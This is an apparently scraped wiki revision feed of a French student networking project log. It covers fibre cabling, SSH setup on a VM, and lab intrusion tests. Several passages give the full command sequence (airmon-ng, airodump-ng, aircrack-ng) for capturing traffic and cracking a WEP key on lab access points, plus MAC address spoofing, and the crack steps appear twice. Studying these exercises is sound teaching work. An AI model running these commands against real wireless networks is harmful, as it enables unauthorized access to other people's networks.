Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34953</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34953"/>
				<updated>2016-11-07T10:30:50Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Travail commun */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changelent d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34825</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34825"/>
				<updated>2016-10-24T10:20:01Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Travail réalisé la 4ème semaine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Tâche particulière ===&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br 